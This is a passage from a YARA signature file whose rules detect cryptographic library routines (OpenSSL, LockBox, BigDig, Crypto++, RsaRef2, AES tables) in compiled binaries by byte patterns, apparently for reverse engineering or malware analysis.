05 00 00 6A 01 51 E8 ?? ?? ?? ?? 
83 C4 08 5F 5E 5B 81 C4 30 05 00 00 C3 3B F7 89 74 24 18 7F 04 89 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_mont\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_mont\"\r\n\tstrings:\r\n\t\t$c0 = { B8 A0 02 00 00 E8 ?? ?? ?? ?? 53 56 57 8B BC 24 BC 02 00 00 33 F6 8B 07 89 74 24 24 89 74 24 20 89 74 24 0C F6 00 01 75 24 68 72 01 00 00 68 ?? ?? ?? ?? 6A 66 6A 6D 6A 03 E8 ?? ?? ?? ?? 83 C4 14 33 C0 5F 5E 5B 81 C4 A0 02 00 00 C3 8B 8C 24 B8 02 00 00 51 E8 ?? ?? ?? ?? 8B D8 83 C4 04 3B DE 89 5C 24 18 75 1C 8B 94 24 B0 02 00 00 6A 01 52 E8 ?? ?? ?? ?? 83 C4 08 5F 5E 5B 81 C4 A0 02 00 00 C3 55 8B AC 24 C4 02 00 00 55 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B F0 55 89 74 24 24 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_recp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_recp\"\r\n\tstrings:\r\n\t\t$c0 = { B8 C8 02 00 00 E8 ?? ?? ?? ?? 8B 84 24 D4 02 00 00 55 56 33 F6 50 89 74 24 1C 89 74 24 18 E8 ?? ?? ?? ?? 8B E8 83 C4 04 3B EE 89 6C 24 0C 75 1B 8B 8C 24 D4 02 00 00 6A 01 51 E8 ?? ?? ?? ?? 83 C4 08 5E 5D 81 C4 C8 02 00 00 C3 53 57 8B BC 24 EC 02 00 00 57 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 08 3B DE 0F 84 E7 02 00 00 8D 54 24 24 52 E8 ?? ?? ?? ?? 8B B4 24 EC 02 00 00 83 C4 04 8B 46 0C 85 C0 74 32 56 53 E8 ?? ?? ?? ?? 83 C4 08 85 C0 0F 84 BA 02 00 00 57 8D 44 24 28 53 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_simple\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_simple\"\r\n\tstrings:\r\n\t\t$c0 = { B8 98 02 00 00 E8 ?? ?? ?? ?? 8B 84 24 A4 02 00 00 55 56 33 ED 50 89 6C 24 1C 89 6C 24 18 E8 ?? ?? ?? ?? 8B F0 83 C4 04 3B F5 89 74 24 0C 75 1B 8B 8C 24 A4 02 00 00 6A 01 51 E8 ?? ?? ?? ?? 83 C4 08 5E 5D 81 C4 98 02 00 00 C3 53 57 8B BC 24 BC 02 00 00 57 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 08 3B DD 0F 84 71 02 00 00 8D 54 24 28 52 E8 ?? ?? ?? ?? 
8B AC 24 BC 02 00 00 8B 84 24 B4 02 00 00 57 55 8D 4C 24 34 50 51 C7 44 24 30 01 00 00 00 E8 ?? ?? ?? ?? 83 C4 14 85 C0 0F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_inverse\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_inverse\"\r\n\tstrings:\r\n\t\t$c0 = { B8 18 00 00 00 E8 ?? ?? ?? ?? 53 55 56 57 8B 7C 24 38 33 C0 57 89 44 24 20 89 44 24 24 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 57 89 44 24 1C E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 57 89 44 24 28 E8 ?? ?? ?? ?? 57 8B E8 E8 ?? ?? ?? ?? 57 8B D8 E8 ?? ?? ?? ?? 8B F8 8B 44 24 54 50 89 7C 24 38 E8 ?? ?? ?? ?? 83 C4 20 89 44 24 24 85 C0 8B 44 24 2C 0F 84 78 05 00 00 85 C0 75 05 E8 ?? ?? ?? ?? 85 C0 89 44 24 1C 0F 84 63 05 00 00 8B 4C 24 14 6A 01 51 E8 ?? ?? ?? ?? 6A 00 57 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_DSA\r\n{\r\n\tmeta:\r\n\t\tauthor=\"_pusher_\"\r\n\t\tdate=\"2016-08\"\r\n\tstrings:\t\r\n\t\t$a0 = \"bignum_data\" wide ascii nocase\r\n\t\t$a1 = \"DSA_METHOD\" wide ascii nocase\r\n\t\t$a2 = \"PDSA\" wide ascii nocase\r\n\t\t$a3 = \"dsa_mod_exp\" wide ascii nocase\r\n\t\t$a4 = \"bn_mod_exp\" wide ascii nocase\r\n\t\t$a5 = \"dsa_do_verify\" wide ascii nocase\r\n\t\t$a6 = \"dsa_sign_setup\" wide ascii nocase\r\n\t\t$a7 = \"dsa_do_sign\" wide ascii nocase\r\n\t\t$a8 = \"dsa_paramgen\" wide ascii nocase\r\n\t\t$a9 = \"BN_MONT_CTX\" wide ascii nocase\r\n\tcondition:\r\n\t\t7 of ($a*)\r\n}\r\n\r\nrule FGint_RsaSign\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"FGint RsaSign\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 B8 53 56 57 89 4D F8 8B FA 89 45 FC 8B 75 0C 8B 5D 10 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 
33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 F0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule LockBox_RsaEncryptFile\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox RsaEncryptFile\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F8 53 56 8B F1 8B DA 6A 20 8B C8 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 FC 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 68 FF FF 00 00 8B CB B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8A 45 08 50 8B CE 8B 55 F8 8B 45 FC E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_DecryptRsaEx\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox DecryptRsaEx\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F4 53 56 57 89 4D F8 89 55 FC 8B D8 33 C0 8A 43 04 0F B7 34 45 ?? ?? ?? ?? 0F B7 3C 45 ?? ?? ?? ?? 8B CE B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F4 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 55 FC 8B CE 8B 45 F4 E8 ?? ?? ?? ?? 6A 00 B1 02 8B D3 8B 45 F4 E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 3B C7 7E 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 8B C8 8B 55 F8 8B 45 F4 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_EncryptRsaEx\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox EncryptRsaEx\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F8 53 56 57 89 4D FC 8B FA 8B F0 33 C0 8A 46 04 0F B7 1C 45 ?? ?? ?? ?? 8B CB B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B D7 8B 4D 08 8B 45 F8 E8 ?? ?? ?? ?? 6A 01 B1 02 8B D6 8B 45 F8 E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 3B C3 7E 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8B C8 8B 55 FC 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 
8B 45 F8 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_TlbRsaKey\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox TlbRsaKey\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 84 D2 74 08 83 C4 F0 E8 ?? ?? ?? ?? 8B DA 8B F0 33 D2 8B C6 E8 ?? ?? ?? ?? 33 C0 8A 46 04 8B 15 ?? ?? ?? ?? 0F B7 0C 42 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 46 0C 33 C0 8A 46 04 8B 15 ?? ?? ?? ?? 0F B7 0C 42 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 46 10 8B C6 84 DB 74 0F E8 ?? ?? ?? ?? 64 8F 05 00 00 00 00 83 C4 0C 8B C6 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_bpInit\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig bpInit\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B 74 24 0C 6A 04 56 E8 ?? ?? ?? ?? 8B C8 8B 44 24 10 83 C4 08 85 C9 89 08 75 04 33 C0 5E C3 89 70 08 C7 40 04 00 00 00 00 5E C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModExp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B 74 24 18 85 F6 75 05 83 C8 FF 5E C3 53 55 8B 6C 24 18 57 56 55 E8 ?? ?? ?? ?? 8B D8 83 C4 08 BF 00 00 00 80 8B 44 9D FC 85 C7 75 04 D1 EF 75 F8 83 FF 01 75 08 BF 00 00 00 80 4B EB 02 D1 EF 8B 44 24 18 56 8B 74 24 18 50 56 E8 ?? ?? ?? ?? 83 C4 0C 85 DB 74 4F 8D 6C 9D FC 8B 4C 24 24 8B 54 24 20 51 52 56 56 56 E8 ?? ?? ?? ?? 8B 45 00 83 C4 14 85 C7 74 19 8B 44 24 24 8B 4C 24 20 8B 54 24 18 50 51 52 56 56 E8 ?? ?? ?? ?? 83 C4 14 83 FF 01 75 0B 4B BF 00 00 00 80 83 ED 04 EB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC 2C 07 00 00 8D 84 24 CC 00 00 00 53 56 8B B4 24 44 07 00 00 57 56 6A 01 50 E8 ?? ?? ?? ?? 8B 8C 24 4C 07 00 00 56 8D 94 24 80 02 00 00 51 52 E8 ?? ?? ?? ?? 8D 84 24 BC 01 00 00 56 50 E8 ?? ?? ?? ?? 8B 9C 24 64 07 00 00 56 8D 4C 24 30 53 51 E8 ?? ?? ?? ?? 8D 54 24 38 56 52 BF 01 00 00 00 E8 ?? ?? ?? ?? 
83 C4 34 85 C0 0F 85 ED 00 00 00 8D 44 24 0C 56 50 8D 8C 24 78 02 00 00 56 8D 94 24 48 03 00 00 51 8D 84 24 18 04 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C 24 BC 01 00 00 56 8D 94 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 98 01 00 00 8D 54 24 00 56 8B B4 24 B0 01 00 00 57 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 C0 01 00 00 8B 94 24 B4 01 00 00 8D 3C 36 56 50 8D 4C 24 20 57 51 52 E8 ?? ?? ?? ?? 8D 44 24 2C 57 50 E8 ?? ?? ?? ?? 83 C4 2C 33 C0 5F 5E 81 C4 98 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModulo\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModulo\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 10 81 EC 30 03 00 00 8B 8C 24 38 03 00 00 8D 54 24 00 56 8B B4 24 40 03 00 00 57 8B BC 24 4C 03 00 00 57 50 56 51 8D 84 24 B0 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 94 24 54 03 00 00 8D 4C 24 20 57 51 52 E8 ?? ?? ?? ?? 8D 44 24 2C 56 50 E8 ?? ?? ?? ?? 8D 8C 24 CC 01 00 00 56 51 E8 ?? ?? ?? ?? 83 C4 34 33 C0 5F 5E 81 C4 30 03 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModExpB\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModExpB\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B 5C 24 10 55 56 BE 00 00 00 80 85 F3 75 04 D1 EE 75 F8 8B 6C 24 14 8B C5 D1 EE 89 44 24 18 74 48 57 8B 7C 24 20 EB 04 8B 44 24 1C 57 50 50 8D 44 24 28 50 E8 ?? ?? ?? ?? 83 C4 10 85 F3 74 14 8B 4C 24 1C 57 55 8D 54 24 24 51 52 E8 ?? ?? ?? ?? 
83 C4 10 D1 EE 75 D0 8B 44 24 14 8B 4C 24 1C 5F 5E 89 08 5D 33 C0 5B C3 8B 54 24 10 5E 5D 5B 89 02 33 C0 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModInv\"\r\n\tstrings:\r\n\t\t$c0 = { 51 8B 4C 24 10 55 56 BD 01 00 00 00 33 F6 57 8B 7C 24 18 89 6C 24 0C 85 C9 74 42 53 8B C7 33 D2 F7 F1 8B C7 8B F9 8B DA 33 D2 F7 F1 8B CB 0F AF C6 03 C5 8B EE 8B F0 8B 44 24 10 F7 D8 85 DB 89 44 24 10 75 D7 85 C0 5B 7D 13 8B 44 24 1C 8B 4C 24 14 2B C5 5F 89 01 5E 33 C0 5D 59 C3 8B 54 24 14 5F 5E 33 C0 89 2A 5D 59 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 83 EC 08 8D 54 24 00 50 51 52 E8 ?? ?? ?? ?? 8B 44 24 24 6A 02 8D 4C 24 10 50 51 E8 ?? ?? ?? ?? 8B 54 24 24 89 02 33 C0 83 C4 20 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CryptoPP_ApplyFunction\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP ApplyFunction\"\r\n\tstrings:\r\n\t\t$c0 = { 51 8D 41 E4 56 8B 74 24 0C 83 C1 F0 50 51 8B 4C 24 18 C7 44 24 0C 00 00 00 00 51 56 E8 ?? ?? ?? ?? 83 C4 10 8B C6 5E 59 C2 08 00 }\r\n\t\t$c1 = { 51 53 56 8B F1 57 6A 00 C7 44 24 10 00 00 00 00 8B 46 04 8B 48 04 8B 5C 31 04 8D 7C 31 04 E8 ?? ?? ?? ?? 50 8B CF FF 53 10 8B 44 24 18 8D 56 08 83 C6 1C 52 56 8B 74 24 1C 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B C6 5F 5E 5B 59 C2 08 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_RsaFunction\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP RsaFunction\"\r\n\tstrings:\r\n\t\t$c0 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 81 EC 9C 00 00 00 8B 84 24 B0 00 00 00 53 55 56 33 ED 8B F1 57 3B C5 89 B4 24 A8 00 00 00 89 6C 24 10 BF 01 00 00 00 74 18 C7 06 ?? ?? ?? ?? C7 46 20 ?? ?? ?? ?? 89 7C 24 10 89 AC 24 B4 00 00 00 8D 4E 04 E8 ?? ?? ?? ?? 8D 4E 10 89 BC 24 B4 00 00 00 E8 ?? ?? ?? ?? 
8B 06 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 48 04 C7 04 31 ?? ?? ?? ?? 8B 16 8B 42 04 8B 54 24 10 83 CA 02 8D 48 E0 89 54 24 10 89 4C 30 FC 89 5C 24 18 89 7C }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 08 8B 44 24 1C 53 8B 5C 24 1C 56 8B F1 57 33 C9 89 74 24 10 3B C1 89 4C 24 0C 74 7B C7 46 04 ?? ?? ?? ?? C7 46 3C ?? ?? ?? ?? C7 46 30 ?? ?? ?? ?? C7 46 34 ?? ?? ?? ?? 3B D9 75 06 89 4C 24 28 EB 0E 8B 43 04 8B 50 0C 8D 44 1A 04 89 44 24 28 8B 56 3C C7 44 24 0C 07 00 00 00 8B 42 04 C7 44 30 3C ?? ?? ?? ?? 8B 56 3C 8B 42 08 C7 44 30 3C ?? ?? ?? ?? 8B 56 3C C7 46 38 ?? ?? ?? ?? 8B 42 04 C7 44 30 3C }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 08 8B 44 24 18 56 8B F1 57 85 C0 89 74 24 0C C7 44 24 08 00 00 00 00 74 63 C7 46 04 ?? ?? ?? ?? C7 46 3C ?? ?? ?? ?? C7 46 30 ?? ?? ?? ?? C7 46 34 ?? ?? ?? ?? 8B 46 3C C7 44 24 08 07 00 00 00 8B 48 04 C7 44 31 3C ?? ?? ?? ?? 8B 56 3C 8B 42 08 C7 44 30 3C ?? ?? ?? ?? 8B 4E 3C C7 46 38 ?? ?? ?? ?? 8B 51 04 C7 44 32 3C ?? ?? ?? ?? 8B 46 3C 8B 48 08 C7 44 31 3C ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8D 7E 04 6A 00 8B CF }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_Integer_constructor\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP Integer constructor\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 08 56 83 F8 08 8B F1 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 8D 04 95 00 00 00 00 89 16 50 E8 ?? ?? ?? ?? 8B 4C 24 0C 89 46 04 C7 46 08 00 00 00 00 89 08 8B 0E 8B 46 04 83 C4 04 49 74 0F 57 8D 78 04 33 C0 F3 AB 8B C6 5F 5E C2 08 00 8B C6 5E C2 08 00 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 51 56 8B F1 89 74 24 04 C7 06 ?? ?? ?? ?? 6A 08 C7 44 24 14 00 00 00 00 C7 46 08 02 00 00 00 E8 ?? ?? ?? ?? 89 46 0C C7 46 10 00 00 00 00 C7 06 ?? ?? ?? ?? 
8B 46 0C 83 C4 04 C7 40 04 00 00 00 00 8B 4E 0C 8B C6 5E C7 01 00 00 00 00 8B 4C 24 04 64 89 0D 00 00 00 00 83 C4 10 C3 }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 51 56 8B F1 57 89 74 24 08 C7 06 ?? ?? ?? ?? 8B 7C 24 1C C7 44 24 14 00 00 00 00 8B CF E8 ?? ?? ?? ?? 83 F8 08 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 85 D2 89 56 08 76 12 8D 04 95 00 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 04 EB 02 33 C0 89 46 0C 8B 4F 10 89 4E 10 }\r\n\t\t$c3 = { 56 57 8B 7C 24 0C 8B F1 8B CF E8 ?? ?? ?? ?? 83 F8 08 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 8D 04 95 00 00 00 00 89 16 50 E8 ?? ?? ?? ?? 8B 16 89 46 04 8B 4F 08 83 C4 04 89 4E 08 8B 4F 04 85 D2 76 0D 2B C8 8B 3C 01 89 38 83 C0 04 4A 75 F5 8B C6 5F 5E C2 04 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule RijnDael_AES\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { A5 63 63 C6 84 7C 7C F8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_CHAR\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES (check2) [char]\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_CHAR_inv\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES S-inv [char]\"\r\n\t\t//needs improvement: the 8A 92 loads below hard-code an absolute table address (bytes 48 38 47 00 = 0x00473848), so this only matches the one build it was taken from - wildcard those four address bytes to make the rule generic\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 48 38 47 00 88 17 33 D2 8A 56 0D 8A 92 48 38 47 00 88 57 01 33 D2 8A 56 0A 8A 92 48 38 47 00 88 57 02 33 D2 8A 56 07 8A 92 48 38 47 00 88 57 03 33 D2 8A 56 04 8A 92 
}\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_LONG\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_NN_modExp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modExp\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC 1C 02 00 00 53 55 56 8B B4 24 30 02 00 00 57 8B BC 24 44 02 00 00 57 8D 84 24 A4 00 00 00 56 50 E8 ?? ?? ?? ?? 8B 9C 24 4C 02 00 00 57 53 8D 8C 24 B4 00 00 00 56 8D 94 24 3C 01 00 00 51 52 E8 ?? ?? ?? ?? 57 53 8D 84 24 4C 01 00 00 56 8D 8C 24 D4 01 00 00 50 51 E8 ?? ?? ?? ?? 8D 54 24 50 57 52 E8 ?? ?? ?? ?? 8B 84 24 78 02 00 00 8B B4 24 74 02 00 00 50 56 C7 44 24 60 01 00 00 00 E8 ?? ?? ?? ?? 8D 48 FF 83 C4 44 8B E9 89 4C 24 18 85 ED 0F 8C AF 00 00 00 8D 34 AE 89 74 24 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule RsaRef2_NN_modInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC A4 04 00 00 53 56 8B B4 24 BC 04 00 00 57 8D 84 24 ?? 00 00 00 56 50 E8 ?? ?? ?? ?? 8D 8C 24 1C 01 00 00 BF 01 00 00 00 56 51 89 BC 24 A0 00 00 00 E8 ?? ?? ?? ?? 8B 94 24 C8 04 00 00 56 8D 84 24 AC 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 9C 24 D8 04 00 00 56 8D 4C 24 2C 53 51 E8 ?? ?? ?? ?? 8D 54 24 34 56 52 E8 ?? ?? ?? ?? 83 C4 30 85 C0 0F 85 ED 00 00 00 8D 44 24 0C 56 50 8D 8C 24 A0 01 00 00 56 8D 94 24 AC 02 00 00 51 8D 84 24 34 03 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C 24 2C 01 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_NN_modMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 08 01 00 00 8D 54 24 00 56 8B B4 24 20 01 00 00 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 2C 01 00 00 56 8D 0C 36 50 8B 84 24 28 01 00 00 8D 54 24 1C 51 52 50 E8 ?? ?? ?? ?? 
68 08 01 00 00 8D 4C 24 2C 6A 00 51 E8 ?? ?? ?? ?? 83 C4 30 5E 81 C4 08 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPrivateDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPrivateDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 8B 8C 24 94 00 00 00 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 50 8B 84 24 98 00 00 00 51 8D 4C 24 0C 50 8D 54 24 14 51 52 E8 ?? ?? ?? ?? 83 C4 14 85 C0 0F 85 8B 00 00 00 39 74 24 04 74 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 8A 44 24 08 84 C0 75 6B 8A 4C 24 09 B8 02 00 00 00 3A C8 75 5E 8D 4E FF 3B C8 76 0D 8A 54 04 08 84 D2 74 05 40 3B C1 72 F3 40 3B C6 73 45 8B 94 24 ?? 00 00 00 8B CE 2B C8 89 0A 8D 51 0B }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPrivateEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPrivateEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 8B 54 24 10 81 EC 80 00 00 00 8D 4A 0B 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 80 00 00 00 C3 8B CE B8 02 00 00 00 2B CA C6 44 24 04 00 49 C6 44 24 05 01 3B C8 76 23 53 55 8D 69 FE 57 8B CD 83 C8 FF 8B D9 8D 7C 24 12 C1 E9 02 